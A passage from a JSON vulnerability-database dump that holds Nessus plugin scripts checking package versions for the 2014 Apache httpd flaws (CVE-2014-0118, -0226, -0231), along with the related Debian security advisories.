(rpm_check(release:\"ALA\", reference:\"httpd24-devel-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-manual-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-tools-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ldap-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_proxy_html-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_session-2.4.10-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ssl-2.4.10-1.59.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd24 / httpd24-debuginfo / httpd24-devel / httpd24-manual / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:12", "bulletinFamily": "scanner", "description": "Updated apache package fixes security vulnerabilities :\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the apache user (CVE-2014-0226).\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the DEFLATE input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system (CVE-2014-0118).\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely (CVE-2014-0231).", "modified": "2019-01-02T00:00:00", "id": "MANDRIVA_MDVSA-2014-142.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76923", "published": "2014-07-31T00:00:00", "title": "Mandriva Linux Security Advisory : apache (MDVSA-2014:142)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:142. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76923);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/01/02 16:37:54\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_bugtraq_id(68678, 68742, 68745);\n script_xref(name:\"MDVSA\", value:\"2014:142\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache (MDVSA-2014:142)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache package fixes security vulnerabilities :\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\napache user (CVE-2014-0226).\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the DEFLATE\ninput filter). A remote attacker able to send a request whose body\nwould be decompressed could use this flaw to consume an excessive\namount of system memory and CPU on the target system (CVE-2014-0118).\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely (CVE-2014-0231).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0304.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-htcacheclean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_authn_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_reqtimeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_userdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-peruser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-devel-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-doc-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-htcacheclean-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_authn_dbd-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_dav-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_dbd-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_deflate-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_disk_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_file_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_ldap-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_mem_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_proxy-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_proxy_ajp-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_proxy_scgi-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_reqtimeout-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_ssl-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_suexec-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_userdir-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-event-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-itk-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-peruser-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-prefork-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-worker-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-source-2.2.27-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:09", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2014:0921 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd module. A malicious HTTP server could cause the httpd child process to crash when the Apache HTTP Server was used as a forward proxy with caching. (CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A remote attacker could send a specially crafted request to a server configured as a reverse proxy using a threaded Multi-Processing Modules (MPM) that would cause the httpd child process to crash.\n(CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the 'DEFLATE' input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2014-0921.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76745", "published": "2014-07-24T00:00:00", "title": "Oracle Linux 7 : httpd (ELSA-2014-0921)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0921 and \n# Oracle Linux Security Advisory ELSA-2014-0921 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76745);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/18 17:43:57\");\n\n script_cve_id(\"CVE-2013-4352\", \"CVE-2014-0117\", \"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_bugtraq_id(68678, 68740, 68742, 68745, 68863);\n script_xref(name:\"RHSA\", value:\"2014:0921\");\n\n script_name(english:\"Oracle Linux 7 : httpd (ELSA-2014-0921)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:0921 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 7.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd\nmodule. A malicious HTTP server could cause the httpd child process to\ncrash when the Apache HTTP Server was used as a forward proxy with\ncaching. (CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A\nremote attacker could send a specially crafted request to a server\nconfigured as a reverse proxy using a threaded Multi-Processing\nModules (MPM) that would cause the httpd child process to crash.\n(CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-July/004292.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-18.0.1.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-18.0.1.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-manual-2.4.6-18.0.1.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-18.0.1.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-18.0.1.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-18.0.1.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-18.0.1.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-18.0.1.el7_0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ldap / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:57", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201504-03 (Apache: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Apache HTTP Server.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker may be able to execute arbitrary code or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-12-05T00:00:00", "id": "GENTOO_GLSA-201504-03.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82733", "published": "2015-04-13T00:00:00", "title": "GLSA-201504-03 : Apache: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201504-03.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82733);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2013-5704\", \"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_bugtraq_id(68678, 68742, 68745, 73135);\n script_xref(name:\"GLSA\", value:\"201504-03\");\n\n script_name(english:\"GLSA-201504-03 : Apache: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201504-03\n(Apache: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Apache HTTP Server.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code or cause a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201504-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-2.2.29'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"ge 2.2.29\"), vulnerable:make_list(\"lt 2.2.29\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:25", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2989-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJuly 24, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nCVE ID : CVE-2014-0118 CVE-2014-0226 CVE-2014-0231\n\nSeveral security issues were found in the Apache HTTP server.\n\nCVE-2014-0118\n\n The DEFLATE input filter (inflates request bodies) in mod_deflate\n allows remote attackers to cause a denial of service (resource\n consumption) via crafted request data that decompresses to a much\n larger size.\n\nCVE-2014-0226\n\n A race condition was found in mod_status. An attacker able to\n access a public server status page on a server could send carefully\n crafted requests which could lead to a heap buffer overflow,\n causing denial of service, disclosure of sensitive information, or\n potentially the execution of arbitrary code.\n\nCVE-2014-0231\n\n A flaw was found in mod_cgid. If a server using mod_cgid hosted\n CGI scripts which did not consume standard input, a remote attacker\n could cause child processes to hang indefinitely, leading to denial\n of service.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 2.2.22-13+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed in\nversion 2.4.10-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.4.10-1.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-07-24T22:20:03", "published": "2014-07-24T22:20:03", "id": "DEBIAN:DSA-2989-1:7BF7C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00171.html", "title": "[SECURITY] [DSA 2989-1] apache2 security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:52", "bulletinFamily": "unix", "description": "Package : apache2\nVersion : 2.2.16-6+squeeze13\nCVE ID : CVE-2013-6438 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231\n\nCVE-2014-0231: prevent denial of service in mod_cgid.\nCVE-2014-0226: prevent denial of service via race in mod_status.\nCVE-2014-0118: fix resource consumption via mod_deflate body decompression.\nCVE-2013-6438: prevent denial of service via mod_dav incorrect end of string\n", "modified": "2014-09-29T13:41:46", "published": "2014-09-29T13:41:46", "id": "DEBIAN:DLA-66-1:F105A", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201409/msg00023.html", "title": "[SECURITY] [DLA 66-1] apache2 security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], 